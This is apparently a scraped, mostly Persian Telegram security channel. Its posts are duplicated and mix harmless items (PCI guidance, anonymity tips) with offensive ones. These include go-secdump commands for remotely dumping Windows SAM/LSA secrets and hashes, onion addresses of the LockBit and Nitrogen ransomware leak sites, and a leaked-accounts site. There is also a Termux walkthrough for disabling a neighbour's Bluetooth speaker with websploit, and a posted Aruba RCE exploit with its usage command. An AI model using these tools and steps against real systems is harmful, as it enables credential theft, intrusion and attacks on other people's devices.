Scan for CVE-2024-47176 (CUPS - Remote Code Execution) with Nuclei
Vulnerability discovery: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
Nuclei Template: https://cloud.projectdiscovery.io/?template=CVE-2024-47176
Source: https://x.com/pdnuclei/status/1840195177098453308
@pfksecurity
Vulnerability discovery: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
Nuclei Template: https://cloud.projectdiscovery.io/?template=CVE-2024-47176
Source: https://x.com/pdnuclei/status/1840195177098453308
@pfksecurity
evilsocket
Attacking UNIX Systems via CUPS, Part I
🔄🖼️ go-secdump v0.3.0
ابزاری برای کپی از راه دور 🏠 اسرار ویندوز (SAM، LSA) بدون ذخیره در دیسک
پشتیبانی برای احراز هویت Kerberos اضافه شده است
مثال:
Relay:
گزینه های اصلی:
▶️ https://github.com/jfjallid/go-secdump
▶️ https://github.com/jfjallid/go-secdump/releases
@PfkSecurity
ابزاری برای کپی از راه دور 🏠 اسرار ویندوز (SAM، LSA) بدون ذخیره در دیسک
پشتیبانی برای احراز هویت Kerberos اضافه شده است
username + password
username + NT Hash
username + AES Key
cached credentials on Linux (TGS or TGT in .ccache file)
مثال:
./go-secdump --host DC01 --user Administrator --pass Password --local --sam --lsa --dcc2Relay:
./go-secdump --host 192.168.0.100 -n --relayگزینه های اصلی:
--host <target>
-P, --port <port>
-d, --domain <domain>
-u, --user <username>
-p, --pass <pass>
-n, --no-pass
--hash <NT Hash>
--local
-k, --kerberos
--dc-ip
--target-ip
--aes-key
--dump
--sam
--lsa
--dcc2
--relay
--relay-port <port>
▶️ https://github.com/jfjallid/go-secdump
▶️ https://github.com/jfjallid/go-secdump/releases
@PfkSecurity
چگونه ناشناس شویم
از یک سیستم عامل متمرکز بر حریم خصوصی مانند Tails استفاده کنید که تمام ترافیک اینترنت را از طریق شبکه Tor هدایت می کند.
از VPN یا TOR برای پنهان کردن آدرس IP و رمزگذاری ترافیک اینترنت خود استفاده کنید.
به جای نام واقعی خود از نام مستعار استفاده کنید.
از استفاده آنلاین از اطلاعات شخصی مانند آدرس منزل یا تاریخ تولد خودداری کنید.
از یک مرورگر وب امن مانند Tor، Brave، StartPage استفاده کنید که از ناشناس بودن شما محافظت می کند و webrtc را غیرفعال می کند.
از استفاده از آدرس ایمیل شخصی خود برای فعالیت های آنلاین خودداری کنید. از ایمیل جعلی برای فعالیت های ناشناس استفاده کنید
از اشتراک گذاری عکس ها یا داده های موقعیت مکانی در رسانه های اجتماعی خودداری کنید.
در صورت امکان از احراز هویت دو مرحله ای برای افزودن یک لایه امنیتی اضافی به حساب های آنلاین خود استفاده کنید.
برای جلوگیری از ردیابی، کوکی ها و تاریخچه مرور خود را به طور مرتب پاک کنید.
از استفاده از نام کاربری یکسان در چندین وب سایت خودداری کنید.
نیازهای خود را کنترل کنید زیرا نیازها و احساسات شما نسبت به دختر شما را آسیب پذیر می کند 💐 ❤️
از استفاده از شماره تلفن شخصی خود برای حساب های آنلاین خودداری کنید. آنها می توانند شما را به راحتی با این ردیابی کنند، در عوض، از یک شماره تلفن مجازی استفاده کنید.
از کلاهبرداری های فیشینگ و سایر تاکتیک ها مانند هانی پات که مهاجمان می توانند برای فریب شما برای افشای اطلاعات شخصی استفاده کنند آگاه باشید.
از یک سرویس به اشتراک گذاری فایل امن مانند SpiderOak استفاده کنید که فایل های شما را رمزگذاری می کند و ذخیره سازی ایمن را ارائه می دهد.
به غریزه خود اعتماد کنید و مراقب هر کسی که اطلاعات شخصی را میپرسد یا مشکوک به نظر میرسد باشید.
@PfkSecurity
از یک سیستم عامل متمرکز بر حریم خصوصی مانند Tails استفاده کنید که تمام ترافیک اینترنت را از طریق شبکه Tor هدایت می کند.
از VPN یا TOR برای پنهان کردن آدرس IP و رمزگذاری ترافیک اینترنت خود استفاده کنید.
به جای نام واقعی خود از نام مستعار استفاده کنید.
از استفاده آنلاین از اطلاعات شخصی مانند آدرس منزل یا تاریخ تولد خودداری کنید.
از یک مرورگر وب امن مانند Tor، Brave، StartPage استفاده کنید که از ناشناس بودن شما محافظت می کند و webrtc را غیرفعال می کند.
از استفاده از آدرس ایمیل شخصی خود برای فعالیت های آنلاین خودداری کنید. از ایمیل جعلی برای فعالیت های ناشناس استفاده کنید
از اشتراک گذاری عکس ها یا داده های موقعیت مکانی در رسانه های اجتماعی خودداری کنید.
در صورت امکان از احراز هویت دو مرحله ای برای افزودن یک لایه امنیتی اضافی به حساب های آنلاین خود استفاده کنید.
برای جلوگیری از ردیابی، کوکی ها و تاریخچه مرور خود را به طور مرتب پاک کنید.
از استفاده از نام کاربری یکسان در چندین وب سایت خودداری کنید.
نیازهای خود را کنترل کنید زیرا نیازها و احساسات شما نسبت به دختر شما را آسیب پذیر می کند 💐 ❤️
از استفاده از شماره تلفن شخصی خود برای حساب های آنلاین خودداری کنید. آنها می توانند شما را به راحتی با این ردیابی کنند، در عوض، از یک شماره تلفن مجازی استفاده کنید.
از کلاهبرداری های فیشینگ و سایر تاکتیک ها مانند هانی پات که مهاجمان می توانند برای فریب شما برای افشای اطلاعات شخصی استفاده کنند آگاه باشید.
از یک سرویس به اشتراک گذاری فایل امن مانند SpiderOak استفاده کنید که فایل های شما را رمزگذاری می کند و ذخیره سازی ایمن را ارائه می دهد.
به غریزه خود اعتماد کنید و مراقب هر کسی که اطلاعات شخصی را میپرسد یا مشکوک به نظر میرسد باشید.
@PfkSecurity
🔸️ موتورهای جستجوی DataBreach
🔹️برخی از بهترین موتورهای جستجوی نقض اطلاعات
∙ Leak.sx - https://leak.sx/
∙ Intelligence X - https://intelx.io/
∙ leakcheck - https://leakcheck.io/
∙ weleakinfo - https://weleakinfo.to/
∙ leakpeek - https://leakpeek.com/
∙ snusbase - https://snusbase.com/
∙ leakedsource - https://wikileaks.org/
∙ leakedstuffs - https://piro.eu.org/
∙ WikiLeaks - https://cryptome.org/
∙ GlobaLeaks - https://lnkd.in/gJqT83f
∙ Firefox Monitor - https://lnkd.in/gW7EqXr
∙ haveibeenpwned? - https://haveibeenpwned.com/
∙ BreachAlarm - https://breachalarm.com/
∙ freetools - https://piro.eu.org/
@PfkSecurity
🔹️برخی از بهترین موتورهای جستجوی نقض اطلاعات
∙ Leak.sx - https://leak.sx/
∙ Intelligence X - https://intelx.io/
∙ leakcheck - https://leakcheck.io/
∙ weleakinfo - https://weleakinfo.to/
∙ leakpeek - https://leakpeek.com/
∙ snusbase - https://snusbase.com/
∙ leakedsource - https://wikileaks.org/
∙ leakedstuffs - https://piro.eu.org/
∙ WikiLeaks - https://cryptome.org/
∙ GlobaLeaks - https://lnkd.in/gJqT83f
∙ Firefox Monitor - https://lnkd.in/gW7EqXr
∙ haveibeenpwned? - https://haveibeenpwned.com/
∙ BreachAlarm - https://breachalarm.com/
∙ freetools - https://piro.eu.org/
@PfkSecurity
leak.sx
Leak.sx | Homepage | best source for hacking tools.
Leak.sx - The best leaked accounts website, Homepage, free combo tool, ai image generator, roblox free roblox accounts, free membership for netflix,Minecraft account generator.
Industrial Control Systems Cybersecurity.pdf
1.6 MB
Industrial Control Systems Cybersecurity
@PfkSecurity
@PfkSecurity
از دوستان کسی اکانت vip tryhackme داره فقط برای 3 روز لازم دارم
اگر دارید ممنون میشم به اشتراک بگذارید :
@Aptmoqx0
اگر دارید ممنون میشم به اشتراک بگذارید :
@Aptmoqx0
امروز سالگرد تاجگذاری شاهنشاه داریوش بزرگ هخامنشی هست
خداوند این کشور را از دشمن، از خشکسالی و دروغ محفوظ دارد.
@PfkSecurity
خداوند این کشور را از دشمن، از خشکسالی و دروغ محفوظ دارد.
@PfkSecurity
🚨گروه باج افزار جدید: نیتروژن : Nitrogen
nitrogenczslprh3xyw6lh5xyjvmsz7ciljoqxxknd7uymkfetfhgvqd.onion
@PfkSecurity
nitrogenczslprh3xyw6lh5xyjvmsz7ciljoqxxknd7uymkfetfhgvqd.onion
@PfkSecurity
💡بعضی از شما پرسیدهاید که URL برای دیدن آخرین نسخههای درام Evil Corp و LockBit چیست:
lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion
@PfkSecurity
lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion
@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
💡دیداس چگونه کار می کند اما نگاهی سه بعدی ...
@PfkSecurity
@PfkSecurity
سلام به همه، امروز در مورد یکی دیگر از کاربردهای جالب termux در گوشی هوشمندتان به شما خواهم گفت.
بیایید موقعیتی را تصور کنیم که در آن همسایگان نمک نخورده و ناکافی شما تصمیم گرفتند در شب موسیقی را از بلندگو/مرکز موسیقی بلوتوث خود پخش کنند. شرایط متفاوت است، اما اگر واقعا مردم شروع به گستاخی می کنند، پس من این راه حل را پیشنهاد می کنم
Termux را باز کنید و این دستورات را بنویسید:
apt install python3
pip install scapy
git clone https://github.com/The404Hacking/websploit
cd websploit
chmod 777 * websploit.py
python3 websploit.py
بعد، هر اسکنر بلوتوثی را باز کنید و آدرس دستگاه مورد نیاز خود را با نام پیدا کنید
سپس این دستورات را وارد کنید:
use bluetooth/bluetooth_pod
set bdaddr xx:xx:xx:xx:xx:xx
در اینجا xx را با آدرس دستگاه مورد نظر جایگزین کنید.
و وارد شوید - run
اکنون می توانید با آرامش در سکوت به رختخواب بروید.
@PfkSecurity
بیایید موقعیتی را تصور کنیم که در آن همسایگان نمک نخورده و ناکافی شما تصمیم گرفتند در شب موسیقی را از بلندگو/مرکز موسیقی بلوتوث خود پخش کنند. شرایط متفاوت است، اما اگر واقعا مردم شروع به گستاخی می کنند، پس من این راه حل را پیشنهاد می کنم
Termux را باز کنید و این دستورات را بنویسید:
apt install python3
pip install scapy
git clone https://github.com/The404Hacking/websploit
cd websploit
chmod 777 * websploit.py
python3 websploit.py
بعد، هر اسکنر بلوتوثی را باز کنید و آدرس دستگاه مورد نیاز خود را با نام پیدا کنید
سپس این دستورات را وارد کنید:
use bluetooth/bluetooth_pod
set bdaddr xx:xx:xx:xx:xx:xx
در اینجا xx را با آدرس دستگاه مورد نظر جایگزین کنید.
و وارد شوید - run
اکنون می توانید با آرامش در سکوت به رختخواب بروید.
@PfkSecurity
GitHub
GitHub - The404Hacking/websploit: Websploit is an advanced MITM framework.
Websploit is an advanced MITM framework. Contribute to The404Hacking/websploit development by creating an account on GitHub.
CVE-2024-26304.py
4.3 KB
CVE-2024-26304 RCE-exploit
HPE Aruba Device
usage:
@PfkSecurity
HPE Aruba Device
usage:
python3 CVE-2024-26304.py -u https://127.0.0.1
@PfkSecurity
شورای استانداردهای امنیتی PCI (PCI SSC) راهنمای محدوده و بخش بندی خود را برای معماری های شبکه مدرن به روز کرده است.💪
با توجه به اینکه نسخه قبلی در سال 2017 منتشر شد (در صورت استفاده از حافظه) یک به روز رسانی بسیار خوب و مفید است. در طول این مدت، فناوریها و شیوههایی مانند میکروسرویسها، چند ابری، میکروسگمنتیشن و معماری اعتماد صفر گسترده شدهاند، که البته مستلزم نیاز به توسعه توصیههایی برای طراحی و پیادهسازی ایمن، از جمله. و در زیرساخت های تحت پوشش الزامات PCI DSS💯
#pci #network #architecture
@PfkSecurity
با توجه به اینکه نسخه قبلی در سال 2017 منتشر شد (در صورت استفاده از حافظه) یک به روز رسانی بسیار خوب و مفید است. در طول این مدت، فناوریها و شیوههایی مانند میکروسرویسها، چند ابری، میکروسگمنتیشن و معماری اعتماد صفر گسترده شدهاند، که البته مستلزم نیاز به توسعه توصیههایی برای طراحی و پیادهسازی ایمن، از جمله. و در زیرساخت های تحت پوشش الزامات PCI DSS💯
#pci #network #architecture
@PfkSecurity